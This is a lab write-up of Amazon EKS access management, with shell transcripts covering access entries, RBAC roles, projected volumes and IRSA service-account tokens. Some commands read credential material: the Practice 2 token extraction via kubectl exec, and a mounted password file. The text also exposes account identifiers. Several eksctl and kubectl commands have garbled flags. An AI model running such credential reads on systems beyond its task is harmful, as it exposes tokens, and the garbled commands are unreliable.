(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq
{
"accessEntries": [
"arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR",
"arn:aws:iam::712218945685:root"
]
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR | jq
{
"associatedAccessPolicies": [],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR"
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR | jq
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR",
"kubernetesGroups": [
"system:nodes"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/role/712218945685/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/86c76aae-3ac0-4c57-2e79-ece0c5fcef3e",
"createdAt": "2024-04-13T11:49:50.320000+09:00",
"modifiedAt": "2024-04-13T11:49:50.320000+09:00",
"tags": {},
"username": "system:node:{{EC2PrivateDNSName}}",
"type": "EC2_LINUX"
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR | jq
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR",
"kubernetesGroups": [
"system:nodes"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/role/712218945685/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR/86c76aae-3ac0-4c57-2e79-ece0c5fcef3e",
"createdAt": "2024-04-13T11:49:50.320000+09:00",
"modifiedAt": "2024-04-13T11:49:50.320000+09:00",
"tags": {},
"username": "system:node:{{EC2PrivateDNSName}}",
"type": "EC2_LINUX"
}
}
[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"

[root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get node -v6
I0413 19:24:49.801508 3958 round_trippers.go:553] GET http://localhost:8080/api?timeout=32s in 0 milliseconds
E0413 19:24:49.801643 3958 memcache.go:265] couldn't get current server API group list: Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused
I0413 19:24:49.801682 3958 cached_discovery.go:120] skipped caching discovery info due to Get "http://localhost:8080/api?timeout=32s": dial tcp 127.0.0.1:8080: connect: connection refused

Step 5: Configuring access for the testuser

  • Use the command aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser to create an access entry for the testuser.
  • Use aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster to associate the AmazonEKSClusterAdminPolicy with the testuser.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser

{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/d2c76b7f-30cb-7a87-c451-d8bc2dff2cd3",
"createdAt": "2024-04-13T19:26:19.272000+09:00",
"modifiedAt": "2024-04-13T19:26:19.272000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[]

arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
arn:aws:iam::712218945685:root
arn:aws:iam::712218945685:user/testuser

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks associate-access-policy --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser \
> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster

{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"associatedAccessPolicy": {
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T19:26:39.888000+09:00",
"modifiedAt": "2024-04-13T19:26:39.888000+09:00"
}
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq

{
"associatedAccessPolicies": [
{
"policyArn": "arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy",
"accessScope": {
"type": "cluster",
"namespaces": []
},
"associatedAt": "2024-04-13T19:26:39.888000+09:00",
"modifiedAt": "2024-04-13T19:26:39.888000+09:00"
}
],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser"
}

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq

{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/d2c76b7f-30cb-7a87-c451-d8bc2dff2cd3",
"createdAt": "2024-04-13T19:26:19.272000+09:00",
"modifiedAt": "2024-04-13T19:26:19.272000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

Step 6: Verifying access for the testuser

  • On the [myeks-bastion-2] instance, verify the testuser’s identity using aws sts get-caller-identity --query Arn and kubectl whoami.
  • Test kubectl commands like kubectl get node -v6, kubectl api-resources -v5, kubectl rbac-tool whoami, and kubectl auth can-i delete pods --all-namespaces.
  • Check the aws-auth ConfigMap and IAM identity mapping using kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh and eksctl get iamidentitymapping --cluster $CLUSTER_NAME.
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws sts get-caller-identity --query Arn
"arn:aws:iam::712218945685:user/testuser"

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl whoami
arn:aws:iam::712218945685:user/testuser

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get pod -v6
I0413 19:31:28.779548 4855 loader.go:395] Config loaded from file: /root/.kube/config
I0413 19:31:29.664412 4855 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 872 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 80m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 80m

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl auth can-i get pods --all-namespaces
yes

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl auth can-i delete pods --all-namespaces
yes

(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get cm -n kube-system aws-auth -o yaml | kubectl neat | yh

apiVersion: v1
data:
mapRoles: |
- groups:
- system:bootstrappers
- system:nodes
rolearn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
username: system:node:{{EC2PrivateDNSName}}
mapUsers: |
[]
kind: ConfigMap
metadata:
name: aws-auth
namespace: kube-system
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# eksctl get iamidentitymapping --cluster $CLUSTER_NAME
ARN USERNAME GROUPS ACCOUNT
arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR system:node:{{EC2PrivateDNSName}} system:bootstrappers,system:nodes

Step 7: Deleting the testuser access entry

  • Use the command aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser to delete the access entry for the testuser.
  • Verify the removal using aws eks list-access-entries --cluster-name $CLUSTER_NAME | jq -r .accessEntries[].
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks delete-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#

Step 8: Configuring access with desired permissions

After deleting the testuser’s access entry, we want to confirm that the testuser no longer has access to the cluster, and to verify that the testuser receives “unauthorized” errors and cannot perform any kubectl operations. This step ensures that the deletion of the access entry was successful and the testuser’s permissions have been revoked.

aws sts get-caller-identity --query Arn
kubectl whoami

kubectl get pod -v6
kubectl api-resources -v5
kubectl auth can-i get pods --all-namespaces
kubectl auth can-i delete pods --all-namespaces

Step 9: Creating custom ClusterRoles & ClusterRoleBindings and associating Kubernetes groups

#
cat <<EoF> ~/pod-viewer-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-viewer-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["list", "get", "watch"]
EoF

cat <<EoF> ~/pod-admin-role.yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: pod-admin-role
rules:
- apiGroups: [""]
resources: ["pods"]
verbs: ["*"]
EoF

kubectl apply -f ~/pod-viewer-role.yaml
kubectl apply -f ~/pod-admin-role.yaml
kubectl create clusterrolebinding viewer-role-binding --clusterrole=pod-viewer-role --group=pod-viewer
kubectl create clusterrolebinding admin-role-binding --clusterrole=pod-admin-role --group=pod-admin

# aws eks create-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:37:55.582000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-associated-access-policies --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser

{
"associatedAccessPolicies": [],
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser"
}

# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks describe-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser | jq
{
"accessEntry": {
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:37:55.582000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
}

// kubernetesGroup 업데이트 적용
# (iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-admin | jq -r .accessEntry
{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-admin"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:39:32.125000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}

We create two custom ClusterRoles: “pod-viewer-role” and “pod-admin-role”. The “pod-viewer-role” grants permissions to list, get, and watch pods, while the “pod-admin-role” grants full permissions (all verbs) on pods. By creating these ClusterRoles, we define the desired permissions that we want to assign to the testuser later. This step prepares the necessary roles for testing different access levels.

Then we create ClusterRoleBindings to associate the custom ClusterRoles with Kubernetes groups. The “viewer-role-binding” binds the “pod-viewer-role” to the “pod-viewer” group, and the “admin-role-binding” binds the “pod-admin-role” to the “pod-admin” group. By creating these bindings, we establish a connection between the roles and the groups. Additionally, we create an access entry for the testuser and assign them to the “pod-viewer” group using the aws eks create-access-entry command. This step sets up the necessary bindings and assigns the testuser to the desired group for testing their permissions.

Step 10. Verifying testuser’s access with the assigned Kubernetes group

# testuser 정보 확인
aws sts get-caller-identity --query Arn
kubectl whoami

# kubectl 시도
kubectl get pod -v6
kubectl api-resources -v5
kubectl auth can-i get pods --all-namespaces
kubectl auth can-i delete pods --all-namespaces
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# aws eks update-kubeconfig --name $CLUSTER_NAME --user-alias testuser
Updated context testuser in /root/.kube/config
(testuser:N/A) [root@sigridjin-ekscluster-240413-3-bastion-2 ~]# kubectl get pod -v6
I0413 19:39:48.672663 5809 loader.go:395] Config loaded from file: /root/.kube/config
I0413 19:39:49.507306 5809 round_trippers.go:553] GET https://FB2B4F9828DC3F7D24A84A4A8FA76632.gr7.ap-northeast-2.eks.amazonaws.com/api/v1/namespaces/default/pods?limit=500 200 OK in 827 milliseconds
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 89m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 89m

After assigning the testuser to the “pod-viewer” group, we want to verify their access permissions. By running these commands, we check if the testuser can perform actions allowed by the “pod-viewer-role”, such as getting pods, but cannot perform actions like deleting pods. This step ensures that the testuser’s permissions are correctly enforced based on the assigned Kubernetes group.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks update-access-entry --cluster-name $CLUSTER_NAME --principal-arn arn:aws:iam::$ACCOUNT_ID:user/testuser --kubernetes-group pod-viewer | jq -r .accessEntry
{
"clusterName": "sigridjin-ekscluster-240413-3",
"principalArn": "arn:aws:iam::712218945685:user/testuser",
"kubernetesGroups": [
"pod-viewer"
],
"accessEntryArn": "arn:aws:eks:ap-northeast-2:712218945685:access-entry/sigridjin-ekscluster-240413-3/user/712218945685/testuser/ccc76b84-80d7-a232-d5b2-37f6744c64f3",
"createdAt": "2024-04-13T19:37:55.582000+09:00",
"modifiedAt": "2024-04-13T19:41:46.616000+09:00",
"tags": {},
"username": "arn:aws:iam::712218945685:user/testuser",
"type": "STANDARD"
}
# kubectl delete pod awscli-pod-5bdb44b5bd-cmddg
Error from server (Forbidden): pods "awscli-pod-5bdb44b5bd-cmddg" is forbidden: User "arn:aws:iam::712218945685:user/testuser" cannot delete resource "pods" in API group "" in the namespace "defau

After updating the testuser’s Kubernetes group to “pod-admin”, we want to verify their new access permissions. By running these commands, we check if the testuser can now perform actions allowed by the “pod-admin-role”, such as deleting pods. This step ensures that the testuser’s permissions have been successfully updated based on the modified Kubernetes group.

EKS IRSA (IAM Roles for Service Accounts) and Pod Identity

  • IRSA is a way to grant permissions to individual pods in an EKS cluster. Before IRSA, there was a problem with the process of granting permissions to pods.
  • Worker nodes in EKS have an IAM policy attached to them, which means if a single pod on a worker node is compromised, it can access all the permissions granted to the worker node. This violates the principle of least privilege and poses a security risk. IRSA solves this problem by allowing you to assign specific permissions to specific pods, minimizing the risk of unauthorized access.
  • When a Kubernetes pod wants to use an AWS service, it authenticates and gets authorized through AWS STS and IAM, using an IAM OIDC Identity Provider associated with the EKS cluster. This allows you to connect specific pods with specific permissions, enabling them to use specific AWS services.
  • Service Account Token Volume Projection: Instead of using secret-based volumes for service account tokens, IRSA uses projected volumes.
  • Admission Control: Kubernetes admission controllers intercept and modify or validate requests before they are persisted in the cluster.
  • JWT (JSON Web Token): A compact, URL-safe means of representing claims to be transferred between two parties.
  • OIDC (OpenID Connect): An authentication layer on top of OAuth 2.0, which allows clients to verify the identity of an end-user based on the authentication performed by an authorization server.

Service Account Token Volume Projection Link

  • Default service account tokens are not sufficient for pod-to-pod communication because they lack necessary token attributes like expiration.
  • Service Account Token Volume Projection solves this by allowing you to specify token attributes in the pod specification.
  • The service account admission controller adds a projected volume instead of a secret-based volume for non-expiring service account tokens created by the token controller.

Bound Service Account Token Volume Link

  • ServiceAccountToken: Obtained from the TokenRequest API of the kube-apiserver, valid for 1 hour or until the pod is deleted.
  • ConfigMap: Contains the CA bundle used to verify the connection to the kube-apiserver.
  • DownwardAPI: References the namespace of the pod.
apiVersion: v1
kind: Pod
metadata:
name: test-projected-volume
spec:
containers:
- name: test-projected-volume
image: busybox:1.28
args:
- sleep
- "86400"
volumeMounts:
- name: all-in-one
mountPath: "/projected-volume"
readOnly: true
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
# Create the Secrets
echo -n "admin" > ./username.txt
echo -n "1f2d1e2e67df" > ./password.txt

## Package these files into secrets:
kubectl create secret generic user --from-file=./username.txt
kubectl create secret generic pass --from-file=./password.txt

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl apply -f https://k8s.io/examples/pods/storage/projected.yaml

pod/test-projected-volume created
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod test-projected-volume -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: test-projected-volume
namespace: default
spec:
containers:
- args:
- sleep
- "86400"
image: busybox:1.28
name: test-projected-volume
volumeMounts:
- mountPath: /projected-volume
name: all-in-one
readOnly: true
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-c5fnf
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
serviceAccountName: default
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: all-in-one
projected:
sources:
- secret:
name: user
- secret:
name: pass
- name: kube-api-access-c5fnf
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace

Configuring a Pod to Use a Projected Volume for Storage Link

  • You can use a projected volume to mount several existing volume sources (secret, configMap, downwardAPI, serviceAccountToken) into the same directory. This allows you to consolidate multiple volume sources into a single directory for easier access.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it test-projected-volume
error: you must specify at least one command for the container
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it test-projected-volume -- /bin/sh
/ # ls
bin home root usr
dev proc sys var
etc projected-volume tmp
/ # cd projected-volume
/projected-volume # ls
password.txt username.txt
/projected-volume # cat username.txt
admin/projected-volume # cat password.txt
1f2d1e2e67df/projected-volume #

Kubernetes API access flow

https://kubernetes.io/blog/2019/03/21/a-guide-to-kubernetes-admission-controllers/
  • Authentication (AuthN) → Authorization (AuthZ) → Admission Control
  • Admission Control consists of Mutating Webhooks and Validating Webhooks
  • Mutating Webhooks allow administrators to modify user requests.
  • Validating Webhooks allow administrators to deny user requests.
  • Users can implement their own Admission Controllers using Dynamic Admission Controllers.
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get validatingwebhookconfigurations

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h35m
eks-aws-auth-configmap-validation-webhook 1 8h
kube-prometheus-stack-admission 1 7h46m
vpc-resource-validating-webhook 2 8h
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get mutatingwebhookconfigurations
NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h35m
kube-prometheus-stack-admission 1 7h46m
pod-identity-webhook 1 8h
vpc-resource-mutating-webhook 1 8h

Introduction to IRSA

IRSA allows pods to assume specific IAM roles by sending a token to AWS. AWS then verifies if the pod can use the IAM role based on the token and the EKS Identity Provider (IdP). Instead of mapping roles to nodes, IRSA enables mapping roles directly to pods.

Practice 1: Creating a Pod without a Service Account Token

  1. Create a pod without explicitly setting a Service Account (SA). The default SA will be used.
  2. The pod, once running, executes the s3 ls command.
  3. However, due to lack of permissions, the command results in an “Access Denied” error. This is because the SA needs to be assigned a token.
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test1
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
args: ['s3', 'ls']
restartPolicy: Never
automountServiceAccountToken: false
terminationGracePeriodSeconds: 0
EOF

kubectl get pod
kubectl describe pod

kubectl logs eks-iam-test1

kubectl delete pod eks-iam-test1

Practice 2: Creating a Pod with a Service Account Token

  1. Create a pod named “eks-iam-test2” using the provided YAML configuration.
  2. Verify the pod’s details using kubectl get pod, kubectl describe pod, and kubectl get pod eks-iam-test2 -o yaml.
  3. Check the mounted Service Account token by executing kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount and kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  4. Attempt to use an AWS service by running kubectl exec -it eks-iam-test2 -- aws s3 ls, which will fail due to insufficient permissions.
  5. Extract the Service Account token using SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token).
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test2
spec:
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF

kubectl get pod
kubectl describe pod
kubectl get pod eks-iam-test2 -o yaml | kubectl neat | yh
kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount
kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token ;echo

kubectl exec -it eks-iam-test2 -- aws s3 ls

SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $SA_TOKEN

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 104m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 104m
eks-iam-test1 0/1 Error 0 71s
eks-iam-test2 1/1 Running 0 28s
test-projected-volume 1/1 Running 0 7m42s

Analyzing the Service Account Token

  1. Decode the SA_TOKEN using a JWT decoding tool or the provided JWT website (https://jwt.io/).
  2. The decoded token consists of a header and a payload.
  • The header contains the algorithm (alg) and key ID (kid) used for token verification.
  • The payload includes OAuth2 properties such as aud (audience) and exp (expiration). These properties are added to the token using the projectedServiceAccountToken feature.
  • The iss (issuer) property represents the EKS OpenID Connect Provider (EKS IdP) address, which is used to verify the validity of the token issued by Kubernetes.

3. Delete the “eks-iam-test2” pod using kubectl delete pod eks-iam-test2.

Practice 3: Create it with OIDC

You need to create an IAM role that will be associated with the Kubernetes service account. We can use the eksctl command to create the IAM role and attach the desired policies. In this example, we’ll create a role named “my-sa” with the “AmazonS3ReadOnlyAccess” policy.

eksctl create iamserviceaccount \
- name my-sa \
- namespace default \
- cluster $CLUSTER_NAME \
- approve \
- attach-policy-arn $(aws iam list-policies - query 'Policies[?PolicyName==`AmazonS3ReadOnlyAccess`].Arn' - output text)

You can verify the creation of the IAM role by checking the AWS CloudFormation stack and the IAM console. Run the following command to list the IAM service accounts:

eksctl get iamserviceaccount - cluster $CLUSTER_NAME

Let’s inspect the newly created Kubernetes service account to see the associated IAM role.

kubectl get sa
kubectl describe sa my-sa

The output will show the annotations linking the service account to the IAM role.

Let’s create a pod that uses the “my-sa” service account. Create a file named “pod.yaml” with the following content:

apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test
spec:
serviceAccountName: my-sa
containers:
- name: aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0

Let’s test if the pod can access AWS services using the assumed IAM role. Exec into the pod:

kubectl describe pod eks-iam-test
kubectl exec -it eks-iam-test - /bin/bash

Inside the pod, run the following commands to verify the AWS identity and access:

aws sts get-caller-identity
aws s3 ls

We create a pod named “eks-iam-test3” that uses the “my-sa” service account.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
> name: eks-iam-test3
> spec:
> serviceAccountName: my-sa
> containers:
> - name: my-aws-cli
> image: amazon/aws-cli:latest
> command: ['sleep', '36000']
> restartPolicy: Never
> terminationGracePeriodSeconds: 0
> EOF
pod/eks-iam-test3 created

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
spec:
serviceAccountName: my-sa
containers:
- name: my-aws-cli
image: amazon/aws-cli:latest
command: ['sleep', '36000']
restartPolicy: Never
terminationGracePeriodSeconds: 0
EOF

When a pod is created with a service account, a mutating webhook is triggered to add environment variables and a volume to the pod.

kubectl get mutatingwebhookconfigurations pod-identity-webhook -o yaml | kubectl neat | yh

webhooks:
- admissionReviewVersions:
- v1beta1
clientConfig:
caBundle: "..."
url: https://127.0.0.1:23443/mutate
failurePolicy: Ignore
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3
NAME READY STATUS RESTARTS AGE
eks-iam-test3 1/1 Running 0 73s

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_ROLE_ARN
value: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD
- name: AWS_WEB_IDENTITY_TOKEN_FILE
value: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-2c4jv
readOnly: true
